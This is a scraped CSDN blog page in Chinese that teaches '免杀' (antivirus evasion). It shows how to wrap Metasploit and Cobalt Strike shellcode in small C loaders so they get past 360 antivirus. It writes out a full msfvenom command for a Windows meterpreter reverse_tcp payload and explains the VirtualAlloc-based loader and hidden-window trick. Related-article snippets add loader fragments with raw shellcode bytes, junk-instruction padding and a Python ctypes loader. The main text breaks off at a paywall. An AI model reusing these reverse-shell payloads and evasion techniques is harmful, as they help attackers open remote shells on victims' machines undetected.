shellcode免杀丨C语言三条指令免杀360!你还困吗?

最新推荐文章于 2024-07-23 14:38:11 发布
最新推荐文章于 2024-07-23 14:38:11 发布
阅读量1.8k 收藏 15
点赞数 1
分类专栏: C/C++进阶学习 文章标签: c语言 免杀 免杀360 shellcode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HUYA69/article/details/120156619
版权
本文介绍了如何使用C语言编写shellcode,并通过三条指令实现对360杀毒软件的免杀。内容包括VirtualAlloc函数的应用、内存分配策略以及代码详解,最终展示免杀效果并通过360扫描验证。
摘要由CSDN通过智能技术生成

shellcode免杀(1)C语言三条指令免杀360

✉ 1

简介

描述有错的地方各位师傅海涵。

经过一下午的C语言测试,得出了十多种过360的·方法,这里拿三种c的方式过360(思路大体相同),还有一个c++的免杀360和火绒都可以过等有时间都可以跟大家更新。

✉ 2

免杀过程

废话就不多讲了对于初学者友好发展,先看一遍制作过程,我们准备好msf和cs的shllecode

msfvenom -p windows/meterpreter/reverse_tcp LHOST="自己IP" LPORT="自己的端口" -f c > shell.txt

CS生成shellcode,要用c语言的shellcode,每个语言的解析shellcode方式不同所以这里要选好语言形式。

接下来就是把这些shellcode放到源码里进行免杀上线了,接下来的三种c语言免杀都是只能过360的,火绒动态被查,但是最后的C++是两个都可以过的,先来看个正经c语言免杀

看下图,没错c语言免杀就需要这点代码,而且这是八年前的代码,如果研究免杀的朋友应该很眼熟毕竟也是传烂了,本文也主要为了解析免杀,我们来一步步分析。

从这里开始麻烦真的想学免杀的仔细阅读,这是最简单的入门,如果你看不下去就不要学了。

前三行其实就和Java,python的import一样;第四行也就是我们箭头指的这行是隐藏弹出窗口,也就是不让控制台蹦出来,至于unsignedchar指无符号类型的字符数组,这里各位理解为扩容就行了.

下边为代码主要部分,pvoid就是指针,学过c语言的朋友都知道基本都用*代替了这里方便讲解就用了本体类型


                

        

        

    

  


        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  C语言编程俱乐部
                
              
            

            

                关注
              
            

        

        

          
      

      

            

                专栏目录
          









                



	

		

			

				
					
【护网必备】Windows平台shellcode免杀加载器

				
			

			

				

					Fly_鹏程万里
				

				

					06-14
					
					327
					
				

			

		

		

			
				
bypass:McAfee、金山(数字签名)、火绒、ESET、卡巴企业版(时间5s 抖动50 Sleep_mask)、360全家桶(物理机)、Norton(加白程序资源)、WDF(PC)、WDF(Server)、Symantec(加白程序资源)bypass:金山(数字签名)、火绒、ESET、360全家桶(物理机)、WDF(PC)、WDF(服务器提示复查(关云保护))、McAfee、Norton(加白程序资源)、卡巴企业版(时间5s 抖动50 Sleep_mask)必须使用Bof操作,shell运行就掉线。

			
		

	



                

              
                



	

		

			

				
					
【Windows】Shellcode免杀,过360、火绒、Defender 静态及主防

				
			

			

				

					古月浪子的博客
				

				

					02-17
					
					7089
					
				

			

		

		

			
				
Shellcode,顾名思义是一段拿来执行的代码片段,我们可以使用Shellcode来完成我们需要的任务
弹窗的代码,可以被认为是一段Shellcode,获取某个模块的基址的代码,也可以被认为是一段Shellcode,同理,拿来干坏事的代码,也是Shellcode
如今的杀毒软件都拥有查杀病毒木马的能力,除了静态的查杀,还有动态的主动防御,若恶意代码片段(拿来干坏事的Shellcode)被杀软发现,则可以认为当前运行的程序是病毒木马或是被感染的文件,理应“杀掉”
有些时候,我们不想让自己写的代码被杀毒软件当

			
		

	



                


  
              

                


	

		

			

				
					
c语言免杀火绒

				
			

			

				

					记录学习,一起进步
				

				

					11-18
					
					738
					
				

			

		

		

			
				
c语言随机数异或加密免杀


			
		

	





	

		

			

				
					
c语言免杀,cs免杀

				
			

			

				

					weixin_42306938的博客
				

				

					05-22
					
					919
					
				

			

		

		

			
				
思路①利用c语言+veil实现免杀#include "pch.h"//可以删除#include #include #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//不显示窗口unsigned char shellcode[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\...

			
		

	



		

			
		



	

		

			

				
					
【网络安全】简单的免杀方法(非常详细)零基础入门到精通,收藏这一篇就够了

					
最新发布

				
			

			

				

					Button12138的博客
				

				

					07-23
					
					749
					
				

			

		

		

			
				
小七免杀工具包里有很多的工具我就列出其中的一些常用的排名不分前后1、mycclMyccl作为05出品的一款定位工具,到现在还是独领风骚,实用性五星,稳定性五星。2、C32asm一款非常好的静态反汇编工具一般人免杀定位出特征码后都会先到C32里面去改,如果不行就载入od。当然,源码免杀就直接看定位出的东西在源码所对应的代码修改就ok。3、OD作为一款神器,OD有很多作用,破解,免杀啊,都需要它,做免杀不必要学汇编,通读几遍80×86就差不多了4、LordPE。

			
		

	





	

		

			

				
					
exe免杀c语言,实验使用 C 编译 shellcode 免杀上线

				
			

			

				

					weixin_39540018的博客
				

				

					05-19
					
					617
					
				

			

		

		

			
				
实验了一下这篇文章里面介绍的免杀方法:[使用 C 编译 shellcode 免杀上线](https://www.xljtj.com/archives/c-shellcode.html?from=timeline&isappinstalled=0)。这篇文章已经把步骤写的很清楚了,但是我会在本文中也记录清楚每一步,因为文章可能说没就没,记下来自己留个备份。顺便记下我遇到的几个mini tin...

			
		

	





	

		

			

				
					
使用shellcode打造MSF免杀payload及shellcode加载技术

				
			

			

				

					jackey3Lin的专栏
				

				

					10-21
					
					5492
					
				

			

		

		

			
				
0x00 前言 
    经常有同学提及MSF payload的免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀的payload,那就是shellcode。 
0x01 从哪里开始 
    shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode的生成功能,接下来我们就拿最常用的payload:reverse

			
		

	





	

		

			

				
					
c语言免杀程序源码,【程序源码】用纯C语言实现坦克大战

				
			

			

				

					weixin_30663839的博客
				

				

					05-18
					
					227
					
				

			

		

		

			
				
/* time:2017/1/15 *//* edit:www.dotcpp.com */#include#include#include#include#include#define KEY_ESC 0x01#define KEY_SPACE 0x39#define KEY_UP 0x48#define KEY_LEFT 0x4b#define KEY_RIGHT 0x4d#define KEY...

			
		

	





	

		

			

				
					
Shellcode免杀对抗(C/C++)

					
热门推荐

				
			

			

				

					qq_74806534的博客
				

				

					02-17
					
					2万+
					
				

			

		

		

			
				
这里便是杀毒软件杀毒的原理,这就是特征,我们只需要将木马程序进行简单的分析,就能得到shell回连的IP地址和端口,如果杀毒软件发现我们的可执行文件是一个木马程序。加载器的作用:由于shellcode是一段可以执行的二进制代码,因此需要开辟出一段可以读写可操作的地址来运行shellcode,而这就是加载器的作用。之后打开.c文件是一个未编译代码,放到上文的编译代码中,注意这里是x64编译,用的方式三,使用.c文件。因为我们的加载器的特征,各平台杀毒软件都有了已经,所有我们就要用新的,特征没有被锁定。

			
		

	





	

		

			

				
					
30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69)1

				
			

			

				

					08-03
				

			

		

		

			
				
 远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69)1】  在网络安全领域,绕过反病毒软件(AV)的检测,即“免杀”技术,是一项重要的技能。本文将探讨如何利用Python来加载和执行shellcode,同时尽...

			
		

	





	

		

			

				
					
最新过360免杀

				
			

			

				

					12-17
				

			

		

		

			
				
最新过360免杀

			
		

	





	

		

			

				
					
绕过360简单技巧(免杀

				
			

			

				

					06-04
				

			

		

		

			
				
浴血凤凰的教程,用restorator修改版本和图标绕过360杀毒,适合免杀菜鸟看。不错哦

			
		

	





	

		

			

				
					
360免杀技术视频教程|特征码修改和定位|不用数字签名轻松解决报毒问题

				
			

			

				

					05-17
				

			

		

		

			
				
360目前越来越无情了,及时是没有毒的软件,也会报毒。这套视频教程正能助你一臂之力,让你在无签名下不被报毒。

			
		

	





	

		

			

				
					
Python3 Cobalt strike shellcode 免杀360 卫士和360杀毒

				
			

			

				

					课嗨教育的专栏
				

				

					09-09
					
					710
					
				

			

		

		

			
				
Python2.7 现在很多杀毒软件都会查杀免杀效果有点差。可以使用 python3 来做 shellcode免杀处理。

Python3 下载下载最新的版本当前实验的版本是 Python 3.8.6 64 位pyinstaller 4.0 https://www.python.org/downloads/pip install pyinstaller 

Python3 shellcode 加载代码import ctypes 



#shellcode 加载


def shel...

			
		

	





	

		

			

				
					
C++免杀

				
			

			

				

					weixin_33866037的博客
				

				

					10-31
					
					366
					
				

			

		

		

			
				
假设我们的特征码定位在MessageBoxA函数的地址(只是举个例子,一般这个函数不会被杀,其他函数也类似方法)那么我们到源码里面发现,我们在PrintMsg函数中调用了这个API函数,那么我们就要对他进行处理。对于输入表被查杀我们一般的处理方法是修改函数的调用方式,比如采用dll动态调用,通过上图,我们知道我们是以非unicode方式编译的MessageBox,他对应的非Unicode的函数为M...

			
		

	





	

		

			

				
					
免杀基本知识,shellcode混淆免杀

				
			

			

				

					白帽子凯哥聊黑客
				

				

					06-17
					
					1289
					
				

			

		

		

			
				
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查杀技术,这也是360查杀能力强的原因。

			
		

	





	

		

			

				
					
2023-06-28-[免杀学习]shellcode的使用(C++)

				
			

			

				

					qq_42585535的博客
				

				

					06-29
					
					726
					
				

			

		

		

			
				
功能:调整一片在虚拟地址空间的内存的状态返回值:调指向整的内存的起始地址的指针win api为了准确的表达指针的作用对象,将void命名为了许多其他类型,但其本质都是voidvoid类型是一种无类型指针,也就是说它可以指向任意类型的数据用作函数的返回类型,表示函数不返回任何值。用作函数的参数类型,表示函数可以接受任意类型的指针。例如,内存分配函数 malloc 和 memset 的参数就是 void* 类型。

			
		

	





	

		

			

				
					
c语言免杀指令大全,免杀指令

				
			

			

				

					weixin_36219745的博客
				

				

					05-18
					
					892
					
				

			

		

		

			
				
今天送上经典花指令注:编写花指令,可参考以下成双指令,可任意自由组合.达到免杀效果.push ebppop ebppush eaxpop eaxpush esppop esppush 0push 0push 10 -------其中数字可以任意,注意与下面对应push -10nop -----------可任意在中间添加与它等效的:mov EDI,EDIadd esp,1 -------其中数字可...

			
		

	





	

		

			

				
					
ShellCode免杀技术解析与C语言Payload实践

				
			

			

				

					
				

			

		

		

			
				
" ShellCode免杀技术的探讨与实践"  ShellCode免杀的骚姿势文档主要讨论了在网络安全领域中如何避免ShellCode被反病毒软件检测和清除的技术策略。ShellCode通常是一段用机器语言编写的代码,设计用来利用软件漏洞以...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 1

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值